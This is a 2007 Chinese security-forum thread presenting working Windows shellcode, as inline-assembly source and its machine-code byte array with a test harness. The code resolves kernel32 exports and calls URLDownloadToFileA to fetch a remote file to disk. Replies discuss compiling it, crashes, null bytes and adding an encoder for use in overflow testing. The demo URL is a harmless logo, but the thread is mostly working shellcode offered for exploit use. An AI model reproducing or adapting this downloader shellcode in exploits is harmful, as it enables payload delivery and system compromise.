首页
社区
课程
招聘
[原创]生成一个关于URLDownloadToFile的shellcode机器码
发表于: 2007-11-22 12:34 10580

[原创]生成一个关于URLDownloadToFile的shellcode机器码

2007-11-22 12:34
10580

/*以下是源程序*/
void  shellcodeFun()
{
unsigned int uLoadLibrary,uGetProcAddress,uKernelBase;
unsigned int ImageBase,flen;
char *FuncName;   
__asm
{  
  jmp Start
GetFunc:
  mov eax,ImageBase
  mov eax,[eax+0x3c]  
  add eax,ImageBase  
  mov eax,[eax+0x78]      
  add eax,ImageBase  
  mov esi,eax      
  mov ecx,[eax+0x18]  
  mov eax,[eax+0x20]  
  add eax,ImageBase
  mov ebx,eax
  xor edx,edx
FindLoop:
  push ecx
  push esi
  mov eax,[eax]
  add eax,ImageBase
  mov esi,FuncName
  mov edi,eax
  mov ecx,flen
  cld
  rep cmpsb  
  pop esi   
  je  Found
  inc edx
  add ebx,4
  mov eax,ebx
  pop ecx
  loop FindLoop  
Found:
  add esp,4
  mov eax,esi
  mov eax,[eax+0x1c]  
  add eax,ImageBase  
  shl edx,2
  add eax,edx
  mov eax,[eax]   
  add eax,ImageBase
  jmp Founded
  xor eax,eax
Founded:
  ret
}
  
__asm
{
Start:
  push esi
  push ecx

  xor eax, eax        
  xor esi, esi
  mov esi, fs:[esi + 0x18]     
  mov eax, [esi+4]                       
  mov eax, [eax - 0x1c]        
find_kernel32_base:
  dec eax                     
  xor ax, ax
  cmp word ptr [eax], 0x5a4d   
  jne find_kernel32_base      

   pop ecx
  pop esi
  mov uKernelBase,eax
  mov ImageBase,eax
  mov flen,0x0c
  call LL1
  _emit 'L'   
  _emit 'o'
  _emit 'a'
  _emit 'd'
  _emit 'L'
  _emit 'i'
  _emit 'b'
  _emit 'r'
  _emit 'a'
  _emit 'r'
  _emit 'y'
  _emit 'A'
  _emit 0
LL1:
    pop eax
    mov FuncName,eax
    call GetFunc
    mov uLoadLibrary,eax

    mov flen,0x0E
  call LL2
  _emit 'G'   
  _emit 'e'
  _emit 't'
  _emit 'P'
  _emit 'r'
  _emit 'o'
  _emit 'c'
  _emit 'A'
  _emit 'd'
  _emit 'd'
  _emit 'r'
  _emit 'e'
  _emit 's'
  _emit 's'
  _emit 0
LL2:
    pop eax
    mov FuncName,eax
    call GetFunc
    mov uGetProcAddress,eax

    call l1
   _emit 'u'
   _emit 'r'
   _emit 'l'
   _emit 'm'
   _emit 'o'
   _emit 'n'
   _emit '.'
   _emit 'd'
   _emit 'l'
   _emit 'l'
   _emit 0
l1:
  call uLoadLibrary
  mov ebx,eax
  call l2
  _emit 'U'   
  _emit 'R'
  _emit 'L'
  _emit 'D'
  _emit 'o'
  _emit 'w'
  _emit 'n'
  _emit 'l'
  _emit 'o'
  _emit 'a'
  _emit 'd'
  _emit 'T'
  _emit 'o'
  _emit 'F'
  _emit 'i'
  _emit 'l'
  _emit 'e'
  _emit 'A'
  _emit 0
l2:
  push ebx
  call uGetProcAddress
  push 0
  push 0
     call func1
     _emit 'c'
     _emit ':'
     _emit '\\'
     _emit '1'
     _emit '.'
     _emit 'g'
     _emit 0         
func1:
    call func2
   _emit 'h'
   _emit 't'
   _emit 't'
   _emit 'p'
   _emit ':'
   _emit '/'
   _emit '/'
   _emit 'w'
   _emit 'w'
   _emit 'w'
   _emit '.'
   _emit 'b'
   _emit 'a'
   _emit 'i'
   _emit 'd'
   _emit 'u'
   _emit '.'
   _emit 'c'
   _emit 'o'
   _emit 'm'
   _emit '/'
   _emit 'i'
   _emit 'm'
   _emit 'g'
   _emit '/'
   _emit 'l'
   _emit 'o'
   _emit 'g'
   _emit 'o'
   _emit '.'
   _emit 'g'
   _emit 'i'
   _emit 'f'
   _emit 0
func2:
   push 0
   call eax   
   _emit '*'
   _emit '*'
}
}

void main(void)
{
    shellcodeFun();
}

///以下是测试程序:
unsigned char shellcode[]={
0x55,0x8B,0xEC,0x83,0xEC,0x58,0x53,0x56,0x57,0xEB,
0x56,0x8B,0x45,0xF0,0x8B,0x40,0x3C,0x03,0x45,0xF0,
0x8B,0x40,0x78,0x03,0x45,0xF0,0x8B,0xF0,0x8B,0x48,
0x18,0x8B,0x40,0x20,0x03,0x45,0xF0,0x8B,0xD8,0x33,
0xD2,0x51,0x56,0x8B,0x00,0x03,0x45,0xF0,0x8B,0x75,
0xE8,0x8B,0xF8,0x8B,0x4D,0xEC,0xFC,0xF3,0xA6,0x5E,
0x74,0x09,0x42,0x83,0xC3,0x04,0x8B,0xC3,0x59,0xE2,
0xE2,0x83,0xC4,0x04,0x8B,0xC6,0x8B,0x40,0x1C,0x03,
0x45,0xF0,0xC1,0xE2,0x02,0x03,0xC2,0x8B,0x00,0x03,
0x45,0xF0,0xEB,0x02,0x33,0xC0,0xC3,0x56,0x51,0x33,
0xC0,0x33,0xF6,0x64,0x8B,0x76,0x18,0x8B,0x46,0x04,
0x8B,0x40,0xE4,0x48,0x66,0x33,0xC0,0x66,0x81,0x38,
0x4D,0x5A,0x75,0xF5,0x59,0x5E,0x89,0x45,0xF4,0x89,
0x45,0xF0,0xC7,0x45,0xEC,0x0C,0x00,0x00,0x00,0xE8,
0x0D,0x00,0x00,0x00,0x4C,0x6F,0x61,0x64,0x4C,0x69,
0x62,0x72,0x61,0x72,0x79,0x41,0x00,0x58,0x89,0x45,
0xE8,0xE8,0x65,0xFF,0xFF,0xFF,0x89,0x45,0xFC,0xC7,
0x45,0xEC,0x0E,0x00,0x00,0x00,0xE8,0x0F,0x00,0x00,
0x00,0x47,0x65,0x74,0x50,0x72,0x6F,0x63,0x41,0x64,
0x64,0x72,0x65,0x73,0x73,0x00,0x58,0x89,0x45,0xE8,
0xE8,0x3E,0xFF,0xFF,0xFF,0x89,0x45,0xF8,0xE8,0x0B,
0x00,0x00,0x00,0x75,0x72,0x6C,0x6D,0x6F,0x6E,0x2E,
0x64,0x6C,0x6C,0x00,0xFF,0x55,0xFC,0x8B,0xD8,0xE8,
0x13,0x00,0x00,0x00,0x55,0x52,0x4C,0x44,0x6F,0x77,
0x6E,0x6C,0x6F,0x61,0x64,0x54,0x6F,0x46,0x69,0x6C,
0x65,0x41,0x00,0x53,0xFF,0x55,0xF8,0x6A,0x00,0x6A,
0x00,0xE8,0x07,0x00,0x00,0x00,0x63,0x3A,0x5C,0x31,
0x2E,0x67,0x00,0xE8,0x22,0x00,0x00,0x00,0x68,0x74,
0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,0x77,0x2E,0x62,
0x61,0x69,0x64,0x75,0x2E,0x63,0x6F,0x6D,0x2F,0x69,
0x6D,0x67,0x2F,0x6C,0x6F,0x67,0x6F,0x2E,0x67,0x69,
0x66,0x00,0x6A,0x00,0xFF,0xD0,0x5F,0x5E,0x5B,0x8B,
    0xE5,0x5D,0xC3
};

int main(int argc, char* argv[])
{
_asm
{
  lea eax,shellcode
  call eax
}
return 0;
}


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 7
支持
分享
最新回复 (8)
雪    币: 321
活跃值: (271)
能力值: ( LV13,RANK:1050 )
在线值:
发帖
回帖
粉丝
2
呵呵,顶顶。 编译时注意去掉/GZ选项。
2007-11-22 12:49
0
雪    币: 424
活跃值: (1884)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
3

直接用Masm算了……
2007-11-22 13:31
0
雪    币: 375
活跃值: (12)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
4
顺便带个解码的吧~
0x00自己定位不爽啊。

如果加上解码,以后测试溢出就方便了。。
2007-11-24 11:31
0
雪    币: 6
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
虽然下载成功...

可是..程序却 崩溃了!!
2008-3-31 10:36
0
雪    币: 6
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
call func1
     _emit 'c'
     _emit ':'
     _emit '\\'
     _emit '1'
     _emit '.'
     _emit 'g'
     _emit 0  

呵..这里没写完吧!!
2008-3-31 10:38
0
雪    币: 321
活跃值: (271)
能力值: ( LV13,RANK:1050 )
在线值:
发帖
回帖
粉丝
7
使用vc6编译,编译时注意去掉/GZ选项。
2008-3-31 10:45
0
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
8
中间有0, 不实用
2008-3-31 11:44
0
雪    币: 380
活跃值: (101)
能力值: ( LV13,RANK:370 )
在线值:
发帖
回帖
粉丝
9

再变换一下
2008-4-1 15:32
0
游客
登录 | 注册 方可回帖
返回
//